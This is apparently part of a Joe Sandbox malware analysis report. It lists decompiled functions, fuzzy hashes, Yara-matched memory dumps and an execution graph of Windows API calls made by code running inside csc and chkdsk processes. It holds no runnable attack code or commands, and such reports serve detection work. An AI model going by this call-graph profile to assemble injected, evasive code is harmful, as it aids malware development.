                                                      • Instruction Fuzzy Hash: 5B51F7327002297ADF14EAA5EC8AFFAB7B9FF04700F5404A9E505A71D0EB719A45CF64
                                                      Function 053EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: f3ef2df452cb2a642701b64e1528806a0682a037d161e086f2e8553d121b8262
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 0D81A170E092699ADF27CE68C8617FEFBE6BF45350F18415AD891A77D0C7749840CB50
                                                      Function 053DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05417B7F
                                                      • RTL: Re-Waiting, xrefs: 05417BAC
                                                      • RTL: Resource at %p, xrefs: 05417B8E
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: 36e61f33aaeca547e4c4845eac31d97f4257b82cb3701ae62f0d8535eca1447b
                                                      • Instruction ID: 5b3ff2ef251cfcab1ae7f8954a6b4bdc230876096f983c88d932378fdf6d86d5
                                                      • Opcode Fuzzy Hash: 36e61f33aaeca547e4c4845eac31d97f4257b82cb3701ae62f0d8535eca1447b
                                                      • Instruction Fuzzy Hash: 0641F2327047029BC724DE25E951B6BF7EAFF88710F100A1EF95697680DB71E4058FA5
                                                      Function 053DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0541728C
                                                      Strings
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05417294
                                                      • RTL: Re-Waiting, xrefs: 054172C1
                                                      • RTL: Resource at %p, xrefs: 054172A3
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: a43b4ceeab19524ba7005358665965f9d87baa31144f3cecdb25bc35fe35b90b
                                                      • Instruction ID: 40dae1493011d7136d9ca48fe208ade1ff9343067135de3af973994204b59eee
                                                      • Opcode Fuzzy Hash: a43b4ceeab19524ba7005358665965f9d87baa31144f3cecdb25bc35fe35b90b
                                                      • Instruction Fuzzy Hash: 2F41EF32704216ABC725DE25DC41FA6F7B6FB44710F20061AFD55AB680DB31E8168BE5
                                                      Function 053E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: 1c71256210f1bb6d7b33d5ad4fb87f27a24b8c466d21dc1d5d0a192f815eca0f
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: FE919670E042B69BDF28DF69C885ABEB7E6FF84720F14451AE855E72C0E7709D428760
                                                      Function 053A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: d83ed274d1494b2bf0c89fcdec0ab237ca9547356a059ee67e76e97980264cd8
                                                      • Instruction ID: 51db5a04beacb3ee6ab203008dde2597341fb10c876a003f95d75c70a490c9cf
                                                      • Opcode Fuzzy Hash: d83ed274d1494b2bf0c89fcdec0ab237ca9547356a059ee67e76e97980264cd8
                                                      • Instruction Fuzzy Hash: 6C813D76D042699BDB25DB54CC49BEEB7B4BF08710F1045EAE909B7280D7709E84CFA0
                                                      Function 0542CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0542CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4_w@4_w
                                                      • API String ID: 4062629308-713214301
                                                      • Opcode ID: 3830f0f4d8c032bf6829b237be2c63ab27ef2bffe9f1acd4ccc338fb6c4a78ab
                                                      • Instruction ID: 4305278156108f9ce9f635c8be7a95be0d2210eb8e3280740ebbbdb9b9700f76
                                                      • Opcode Fuzzy Hash: 3830f0f4d8c032bf6829b237be2c63ab27ef2bffe9f1acd4ccc338fb6c4a78ab
                                                      • Instruction Fuzzy Hash: 0141AB71E002249ECB21DFA9C885AEEBBB8FF45B04F51446BE905DB264D7709802DB61

                                                      Execution Graph

                                                      Execution Coverage:3.2%
                                                      Dynamic/Decrypted Code Coverage:4.1%
                                                      Signature Coverage:0.7%
                                                      Total number of Nodes:461
                                                      Total number of Limit Nodes:74
                                                      execution_graph 77937 760230 77938 760249 77937->77938 77943 763be0 77938->77943 77940 760267 77941 7602b3 77940->77941 77942 7602a0 PostThreadMessageW 77940->77942 77942->77941 77944 763c04 77943->77944 77945 763c0b 77944->77945 77946 763c40 LdrLoadDll 77944->77946 77945->77940 77946->77945 77947 769e30 77952 769b60 77947->77952 77949 769e3d 77968 769800 77949->77968 77951 769e59 77953 769b85 77952->77953 77980 7674e0 77953->77980 77956 769cc2 77956->77949 77958 769cd9 77958->77949 77959 769cd0 77959->77958 77963 769dc1 77959->77963 77995 773620 77959->77995 78000 769260 77959->78000 77962 773620 GetFileAttributesW 77962->77963 77963->77962 77965 769e19 77963->77965 78009 7695c0 77963->78009 78013 7795f0 77965->78013 77969 769816 77968->77969 77972 769821 77968->77972 77970 7796d0 RtlAllocateHeap 77969->77970 77970->77972 77971 769837 77971->77951 77972->77971 77973 7674e0 GetFileAttributesW 77972->77973 77974 769b2e 77972->77974 77977 773620 GetFileAttributesW 77972->77977 77978 769260 RtlFreeHeap 77972->77978 77979 7695c0 RtlFreeHeap 77972->77979 77973->77972 77975 769b47 77974->77975 77976 7795f0 RtlFreeHeap 77974->77976 77975->77951 77976->77975 77977->77972 77978->77972 77979->77972 77981 7674f1 77980->77981 77982 767508 GetFileAttributesW 77981->77982 77983 767513 77981->77983 77982->77983 77983->77956 77984 771bc0 77983->77984 77985 771bce 77984->77985 77986 771bd5 77984->77986 77985->77959 77987 763be0 LdrLoadDll 77986->77987 77988 771c0a 77987->77988 77989 771c19 77988->77989 78019 771690 LdrLoadDll 77988->78019 77994 771db1 77989->77994 78016 7796d0 77989->78016 77992 7795f0 RtlFreeHeap 77992->77994 77993 771c32 77993->77992 77993->77994 77994->77959 77996 77367d 77995->77996 77997 7736b4 77996->77997 78023 767530 77996->78023 77997->77959 77999 773696 77999->77959 78001 769286 78000->78001 78027 76ca80 78001->78027 78003 7692ed 78005 769470 78003->78005 78007 76930b 78003->78007 78004 769455 78004->77959 78005->78004 78006 769120 RtlFreeHeap 78005->78006 78006->78005 78007->78004 78032 769120 78007->78032 78010 7695e6 78009->78010 78011 76ca80 RtlFreeHeap 78010->78011 78012 769662 78011->78012 78012->77963 78040 777a70 78013->78040 78015 769e20 78015->77949 78020 777a20 78016->78020 78018 7796eb 78018->77993 78019->77989 78021 777a3d 78020->78021 78022 777a4e RtlAllocateHeap 78021->78022 78022->78018 78024 7674f1 78023->78024 78025 767513 78024->78025 78026 767508 GetFileAttributesW 78024->78026 78025->77999 78026->78025 78029 76ca96 78027->78029 78028 76caa3 78028->78003 78029->78028 78030 7795f0 RtlFreeHeap 78029->78030 78031 76cadc 78030->78031 78031->78003 78033 769136 78032->78033 78036 76caf0 78033->78036 78035 76923c 78035->78007 78037 76cb14 78036->78037 78038 76cbac 78037->78038 78039 7795f0 RtlFreeHeap 78037->78039 78038->78035 78039->78038 78041 777a8d 78040->78041 78042 777a9e RtlFreeHeap 78041->78042 78042->78015 78043 766730 78044 76679f 78043->78044 78045 766745 78043->78045 78045->78044 78047 76a330 78045->78047 78048 76a356 78047->78048 78049 76a560 78048->78049 78074 777b00 78048->78074 78049->78044 78051 76a3cc 78051->78049 78077 77a800 78051->78077 78053 76a3e8 78053->78049 78054 76a4ad 78053->78054 78083 776da0 78053->78083 78056 764e00 LdrInitializeThunk 78054->78056 78058 76a4c9 78054->78058 78056->78058 78062 76a548 78058->78062 78094 776970 78058->78094 78059 76a495 78090 767290 78059->78090 78060 76a479 78104 772f60 LdrInitializeThunk 78060->78104 78061 76a44a 78061->78049 78061->78059 78061->78060 78087 764e00 78061->78087 78064 767290 LdrInitializeThunk 78062->78064 78069 76a556 78064->78069 78069->78044 78070 76a51f 78099 776a10 78070->78099 78072 76a539 78105 776b50 78072->78105 78075 777b1a 78074->78075 78076 777b2b CreateProcessInternalW 78075->78076 78076->78051 78078 77a770 78077->78078 78079 7796d0 RtlAllocateHeap 78078->78079 78082 77a7cd 78078->78082 78080 77a7aa 78079->78080 78081 7795f0 RtlFreeHeap 78080->78081 78081->78082 78082->78053 78084 776dbd 78083->78084 78110 5422c0a 78084->78110 78085 76a441 78085->78054 78085->78061 78089 764e3e 78087->78089 78113 776f60 78087->78113 78089->78060 78091 7672a3 78090->78091 78119 776cb0 78091->78119 78093 7672ce 78093->78044 78095 776994 78094->78095 78096 7769df 78094->78096 78095->78070 78125 54239b0 LdrInitializeThunk 78096->78125 78097 776a04 78097->78070 78100 776a31 78099->78100 78101 776a7c 78099->78101 78100->78072 78126 5424340 LdrInitializeThunk 78101->78126 78102 776aa1 78102->78072 78104->78059 78106 776bbc 78105->78106 78107 776b71 78105->78107 78127 5422fb0 LdrInitializeThunk 78106->78127 78107->78062 78108 776be1 78108->78062 78111 5422c11 78110->78111 78112 5422c1f LdrInitializeThunk 78110->78112 78111->78085 78112->78085 78114 776fff 78113->78114 78116 776f84 78113->78116 78118 5422d10 LdrInitializeThunk 78114->78118 78115 777044 78115->78089 78116->78089 78118->78115 78120 776cd4 78119->78120 78121 776d20 78119->78121 78120->78093 78124 5422dd0 LdrInitializeThunk 78121->78124 78122 776d45 78122->78093 78124->78122 78125->78097 78126->78102 78127->78108 78128 775cf0 78130 775d4d 78128->78130 78129 775d84 78130->78129 78133 76a580 78130->78133 78132 775d66 78134 76a543 78133->78134 78135 76a59b 78133->78135 78136 776b50 LdrInitializeThunk 78134->78136 78135->78132 78137 76a548 78136->78137 78138 767290 LdrInitializeThunk 78137->78138 78139 76a556 78138->78139 78139->78132 78140 7708f0 78145 7708ff 78140->78145 78141 770989 78142 770946 78143 7795f0 RtlFreeHeap 78142->78143 78144 770956 78143->78144 78145->78141 78145->78142 78146 770984 78145->78146 78147 7795f0 RtlFreeHeap 78146->78147 78147->78141 78148 77a730 78149 7795f0 RtlFreeHeap 78148->78149 78150 77a745 78149->78150 78151 776bf0 78152 776c71 78151->78152 78153 776c14 78151->78153 78156 5422ee0 LdrInitializeThunk 78152->78156 78154 776ca2 78156->78154 78157 5422ad0 LdrInitializeThunk 78158 759320 78159 7596f2 78158->78159 78161 759b5b 78159->78161 78162 779290 78159->78162 78163 7792b6 78162->78163 78168 753cf0 78163->78168 78165 7792c2 78166 7792f3 78165->78166 78171 773d60 78165->78171 78166->78161 78175 762920 78168->78175 78170 753cfd 78170->78165 78172 773dba 78171->78172 78174 773dc7 78172->78174 78186 760df0 78172->78186 78174->78166 78176 762934 78175->78176 78178 76294d 78176->78178 78179 778160 78176->78179 78178->78170 78181 778178 78179->78181 78180 77819c 78180->78178 78181->78180 78182 776da0 LdrInitializeThunk 78181->78182 78183 7781ee 78182->78183 78184 7795f0 RtlFreeHeap 78183->78184 78185 778201 78184->78185 78185->78178 78187 760e2b 78186->78187 78202 767020 78187->78202 78189 760e33 78190 7796d0 RtlAllocateHeap 78189->78190 78200 7610f6 78189->78200 78191 760e49 78190->78191 78192 7796d0 RtlAllocateHeap 78191->78192 78193 760e5a 78192->78193 78194 7796d0 RtlAllocateHeap 78193->78194 78196 760e6b 78194->78196 78201 760ef2 78196->78201 78217 765e50 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 78196->78217 78197 763be0 LdrLoadDll 78198 7610b3 78197->78198 78213 776480 78198->78213 78200->78174 78201->78197 78203 76704c 78202->78203 78218 766f10 78203->78218 78206 767091 78209 7670ad 78206->78209 78211 777720 NtClose 78206->78211 78207 767079 78208 767084 78207->78208 78224 777720 78207->78224 78208->78189 78209->78189 78212 7670a3 78211->78212 78212->78189 78214 7764da 78213->78214 78216 7764e7 78214->78216 78232 761110 78214->78232 78216->78200 78217->78201 78219 766f2a 78218->78219 78223 767006 78218->78223 78227 776e40 78219->78227 78222 777720 NtClose 78222->78223 78223->78206 78223->78207 78225 77773a 78224->78225 78226 77774b NtClose 78225->78226 78226->78208 78228 776e5a 78227->78228 78231 54235c0 LdrInitializeThunk 78228->78231 78229 766ffa 78229->78222 78231->78229 78248 7672f0 78232->78248 78234 761608 78234->78216 78235 761130 78235->78234 78252 76ff40 78235->78252 78238 761335 78240 77a800 2 API calls 78238->78240 78239 76118b 78239->78234 78255 77a6d0 78239->78255 78242 76134a 78240->78242 78241 767290 LdrInitializeThunk 78244 761375 78241->78244 78242->78244 78260 75fdb0 78242->78260 78244->78234 78244->78241 78246 75fdb0 LdrInitializeThunk 78244->78246 78245 767290 LdrInitializeThunk 78247 7614a0 78245->78247 78246->78244 78247->78244 78247->78245 78249 7672fd 78248->78249 78250 767325 78249->78250 78251 76731e SetErrorMode 78249->78251 78250->78235 78251->78250 78263 779570 78252->78263 78254 76ff61 78254->78239 78256 77a6e6 78255->78256 78257 77a6e0 78255->78257 78258 7796d0 RtlAllocateHeap 78256->78258 78257->78238 78259 77a70c 78258->78259 78259->78238 78270 777990 78260->78270 78266 777880 78263->78266 78265 77959e 78265->78254 78267 777904 78266->78267 78269 7778a1 78266->78269 78268 77791a NtAllocateVirtualMemory 78267->78268 78268->78265 78269->78265 78271 7779ad 78270->78271 78274 5422c70 LdrInitializeThunk 78271->78274 78272 75fdcf 78272->78247 78274->78272 78275 76e6a0 78276 76e704 78275->78276 78304 7656f0 78276->78304 78278 76e834 78279 76e82d 78279->78278 78311 765800 78279->78311 78281 76e9d3 78282 76e8b0 78282->78281 78283 76e9e2 78282->78283 78315 76e480 78282->78315 78284 777720 NtClose 78283->78284 78286 76e9ec 78284->78286 78287 76e8e5 78287->78283 78288 76e8f0 78287->78288 78289 7796d0 RtlAllocateHeap 78288->78289 78290 76e919 78289->78290 78291 76e922 78290->78291 78292 76e938 78290->78292 78293 777720 NtClose 78291->78293 78324 76e370 CoInitialize 78292->78324 78295 76e92c 78293->78295 78296 76e946 78326 777200 78296->78326 78298 76e9c2 78299 777720 NtClose 78298->78299 78300 76e9cc 78299->78300 78301 7795f0 RtlFreeHeap 78300->78301 78301->78281 78302 76e964 78302->78298 78303 777200 LdrInitializeThunk 78302->78303 78303->78302 78305 765723 78304->78305 78306 765744 78305->78306 78330 7772b0 78305->78330 78306->78279 78308 765767 78308->78306 78309 777720 NtClose 78308->78309 78310 7657e9 78309->78310 78310->78279 78312 765825 78311->78312 78335 777090 78312->78335 78316 76e49c 78315->78316 78317 763be0 LdrLoadDll 78316->78317 78319 76e4ba 78317->78319 78318 76e4c3 78318->78287 78319->78318 78320 763be0 LdrLoadDll 78319->78320 78321 76e58e 78320->78321 78322 763be0 LdrLoadDll 78321->78322 78323 76e5e8 78321->78323 78322->78323 78323->78287 78325 76e3d5 78324->78325 78325->78296 78327 77721d 78326->78327 78340 5422ba0 LdrInitializeThunk 78327->78340 78328 77724d 78328->78302 78331 7772cd 78330->78331 78334 5422ca0 LdrInitializeThunk 78331->78334 78332 7772f9 78332->78308 78334->78332 78336 7770ad 78335->78336 78339 5422c60 LdrInitializeThunk 78336->78339 78337 765899 78337->78282 78339->78337 78340->78328 78341 766560 78342 7665cc 78341->78342 78343 766579 78341->78343 78350 7666f5 78342->78350 78352 765980 NtClose LdrInitializeThunk LdrInitializeThunk 78342->78352 78343->78342 78344 777720 NtClose 78343->78344 78345 766594 78344->78345 78351 765980 NtClose LdrInitializeThunk LdrInitializeThunk 78345->78351 78347 7666cf 78347->78350 78353 765b50 NtClose LdrInitializeThunk LdrInitializeThunk 78347->78353 78351->78342 78352->78347 78353->78350 78354 7661a0 78355 7661c7 78354->78355 78358 7670c0 78355->78358 78357 7661eb 78359 7670dd 78358->78359 78365 776e90 78359->78365 78361 767134 78361->78357 78362 76712d 78362->78361 78363 776f60 LdrInitializeThunk 78362->78363 78364 76715d 78363->78364 78364->78357 78366 776f1d 78365->78366 78367 776eb4 78365->78367 78370 5422f30 LdrInitializeThunk 78366->78370 78367->78362 78368 776f56 78368->78362 78370->78368 78371 770560 78372 77057c 78371->78372 78373 7705a4 78372->78373 78374 7705b8 78372->78374 78376 777720 NtClose 78373->78376 78375 777720 NtClose 78374->78375 78378 7705c1 78375->78378 78377 7705ad 78376->78377 78381 779710 RtlAllocateHeap 78378->78381 78380 7705cc 78381->78380 78382 774720 78383 77477a 78382->78383 78385 774787 78383->78385 78386 7722c0 78383->78386 78387 779570 NtAllocateVirtualMemory 78386->78387 78388 7722fe 78387->78388 78389 763be0 LdrLoadDll 78388->78389 78391 772406 78388->78391 78392 772344 78389->78392 78390 772380 Sleep 78390->78392 78391->78385 78392->78390 78392->78391 78393 76796e 78394 767973 78393->78394 78395 767932 78394->78395 78397 7663b0 LdrInitializeThunk LdrInitializeThunk 78394->78397 78397->78395 78398 764faf 78399 764f47 78398->78399 78402 764fb2 78398->78402 78400 764f5b 78399->78400 78403 7777c0 78399->78403 78404 7777e1 78403->78404 78405 77783e 78403->78405 78404->78400 78408 5422e80 LdrInitializeThunk 78405->78408 78406 77786f 78406->78400 78408->78406 78409 761ea8 78410 7656f0 2 API calls 78409->78410 78411 761ed3 78410->78411 78414 75ac50 78415 779570 NtAllocateVirtualMemory 78414->78415 78416 75c2c1 78415->78416 78417 764f10 78418 776da0 LdrInitializeThunk 78417->78418 78419 764f46 78418->78419 78420 7777c0 LdrInitializeThunk 78419->78420 78421 764f5b 78420->78421 78427 777450 78428 7774f6 78427->78428 78430 777475 78427->78430 78429 77750c NtCreateFile 78428->78429 78431 777690 78432 7776f9 78431->78432 78434 7776b4 78431->78434 78433 77770f NtDeleteFile 78432->78433 78435 776d50 78436 776d6a 78435->78436 78439 5422df0 LdrInitializeThunk 78436->78439 78437 776d92 78439->78437 78450 76281c 78451 766f10 2 API calls 78450->78451 78452 76282c 78451->78452 78453 777720 NtClose 78452->78453 78454 762841 78452->78454 78453->78454 78456 7592c0 78457 7592cf 78456->78457 78458 759310 78457->78458 78459 7592fd CreateThread 78457->78459 78460 764e80 78461 767290 LdrInitializeThunk 78460->78461 78462 764eb0 78461->78462 78464 764edc 78462->78464 78465 767210 78462->78465 78466 767254 78465->78466 78471 767275 78466->78471 78472 776ab0 78466->78472 78468 767265 78469 767281 78468->78469 78470 777720 NtClose 78468->78470 78469->78462 78470->78471 78471->78462 78473 776b1c 78472->78473 78475 776ad1 78472->78475 78477 5424650 LdrInitializeThunk 78473->78477 78474 776b41 78474->78468 78475->78468 78477->78474 78478 770101 78490 7775b0 78478->78490 78480 770122 78481 770155 78480->78481 78482 770140 78480->78482 78483 777720 NtClose 78481->78483 78484 777720 NtClose 78482->78484 78487 77015e 78483->78487 78485 770149 78484->78485 78486 77018a 78487->78486 78488 7795f0 RtlFreeHeap 78487->78488 78489 77017e 78488->78489 78491 777646 78490->78491 78493 7775d1 78490->78493 78492 77765c NtReadFile 78491->78492 78492->78480 78493->78480 78494 76b5c0 78496 76b5e9 78494->78496 78495 76b6ed 78496->78495 78497 76b693 FindFirstFileW 78496->78497 78497->78495 78499 76b6ae 78497->78499 78498 76b6d4 FindNextFileW 78498->78499 78500 76b6e6 FindClose 78498->78500 78499->78498 78500->78495 78501 76ef80 78502 76ef9d 78501->78502 78503 763be0 LdrLoadDll 78502->78503 78504 76efbb 78503->78504 78505 768d4b 78506 768d5a 78505->78506 78507 7795f0 RtlFreeHeap 78506->78507 78508 768d61 78506->78508 78507->78508

                                                      Executed Functions

                                                      Function 00759320 Relevance: 39.2, Strings: 31, Instructions: 433COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 27 759320-7596e8 28 7596f2-7596fe 27->28 29 759700-759721 28->29 30 759723-75972d 28->30 29->28 31 75973e-75974a 30->31 32 759762 31->32 33 75974c-759755 31->33 36 759769-759770 32->36 34 759757-75975d 33->34 35 759760 33->35 34->35 35->31 38 759797-75979e 36->38 39 759772-759795 36->39 40 7597a0-7597cd 38->40 41 7597cf-7597d9 38->41 39->36 40->38 42 7597ea-7597f6 41->42 43 759807-75980e 42->43 44 7597f8-759805 42->44 46 759810-759834 43->46 47 75985b-75986c 43->47 44->42 48 759845-759859 46->48 49 759836-75983f 46->49 50 75987d-759886 47->50 48->43 49->48 51 759897-7598a1 50->51 52 759888-759895 50->52 54 7598b2-7598be 51->54 52->50 55 7598c0-7598cc 54->55 56 7598ce-7598d8 54->56 55->54 58 7598e9-7598f5 56->58 59 7598f7-759909 58->59 60 75990b-75991c 58->60 59->58 62 75992d-759939 60->62 63 75994f-759958 62->63 64 75993b-75994d 62->64 66 759a77-759a81 63->66 67 75995e-759977 63->67 64->62 69 759a92-759a9e 66->69 67->67 68 759979-75997c 67->68 70 759982-759988 68->70 71 759ac0-759ad9 69->71 72 759aa0-759aad 69->72 74 7599a4-7599b1 70->74 75 75998a-7599a2 70->75 71->71 73 759adb-759ae2 71->73 76 759aaf-759ab8 72->76 77 759abe 72->77 79 759bc0-759bca 73->79 80 759ae8-759af2 73->80 74->74 81 7599b3-7599c2 74->81 75->70 76->77 77->69 85 759c02-759c0c 79->85 86 759bcc-759be6 79->86 84 759b03-759b0f 80->84 82 7599c4 81->82 83 7599c9-7599d5 81->83 82->66 87 7599d7-7599f8 83->87 88 7599fa-759a00 83->88 89 759b11-759b1a 84->89 90 759b1c-759b26 84->90 93 759c1d-759c29 85->93 91 759bed-759bef 86->91 92 759be8-759bec 86->92 87->83 94 759a04-759a0b 88->94 89->84 96 759b37-759b40 90->96 97 759bf1-759bfa 91->97 98 759c00 91->98 92->91 99 759c3c-759c46 93->99 100 759c2b-759c3a 93->100 101 759a44-759a4d 94->101 102 759a0d-759a1d 94->102 103 759b56 call 779290 96->103 104 759b42-759b54 96->104 97->98 98->79 100->93 108 759a72 101->108 109 759a4f-759a70 101->109 106 759a1f-759a28 102->106 107 759a2e-759a42 102->107 112 759b5b-759b64 103->112 110 759b28-759b31 104->110 106->107 107->94 108->63 109->101 110->96 113 759b66-759b6f 112->113 114 759b71-759b77 112->114 115 759b7d-759b93 113->115 114->115 116 759ba4-759bb0 115->116 116->79 117 759bb2-759bbe 116->117 117->116
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "t$#$#$%$'$'D$*$.$.z$0'$7M$8$;3$< $<f$A$C"$F*$FW$Hp$K$[;$_R$nA$o$y,${"$~$ $/$h
                                                      • API String ID: 0-507472186
                                                      • Opcode ID: 76f8a13f1fe5939c06321efb992b1ae172bb199c40fd381e978a5e9125fb4b58
                                                      • Instruction ID: 86357d6375ff1f8f95e4761bfec784b3cc1659a69dd621c0ce24658250678744
                                                      • Opcode Fuzzy Hash: 76f8a13f1fe5939c06321efb992b1ae172bb199c40fd381e978a5e9125fb4b58
                                                      • Instruction Fuzzy Hash: 6B329CB0D05269CBEB24CF45C898BDDBBB1BB85309F2085D9C50D6B281C7B96AC9CF54
                                                      Function 0076B5C0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0076B6A4
                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0076B6DF
                                                      • FindClose.KERNELBASE(?), ref: 0076B6EA
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 16a20ad5e6b8ceb47d88f4660dc3fbc92ce7833b86e08af8b03ac43903ca680d
                                                      • Instruction ID: 82fffcbdc292ea02788a9a1727dfcb15b4aae6fe841e4c8e68ac5f1d834dad9e
                                                      • Opcode Fuzzy Hash: 16a20ad5e6b8ceb47d88f4660dc3fbc92ce7833b86e08af8b03ac43903ca680d
                                                      • Instruction Fuzzy Hash: F0318371940348BBDB20DBA0CC89FFB777C9B44745F148559B909A7181DB74AA858BA0
                                                      Function 00777450 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 0077753D
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 477f58a97ef932f71a1279cccd95bb228a367dd78ec40fe8a4dca4813d9a0388
                                                      • Instruction ID: d96c33ff3903c151dd99b395cbafbfd782f03865b8461e2e5f2fc700323210b6
                                                      • Opcode Fuzzy Hash: 477f58a97ef932f71a1279cccd95bb228a367dd78ec40fe8a4dca4813d9a0388
                                                      • Instruction Fuzzy Hash: 6531CFB5A00208AFDB04DF98D885EEFB7F9AF8C714F108219FD19A3240D774A951CBA5
                                                      Function 007775B0 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00777685
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 0493dabfe859718ff47aceda00552a6b7c9f430b4426196da1b76d7fd195e02b
                                                      • Instruction ID: 5af350875ffbeb571789e068fb66afd0271f97c45bd32d1da3434d4890e07479
                                                      • Opcode Fuzzy Hash: 0493dabfe859718ff47aceda00552a6b7c9f430b4426196da1b76d7fd195e02b
                                                      • Instruction Fuzzy Hash: DB310AB5A00609AFDB14DF98D841EEF77B9EF8C314F108609FD18A7240D774A8118BA5
                                                      Function 00777880 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
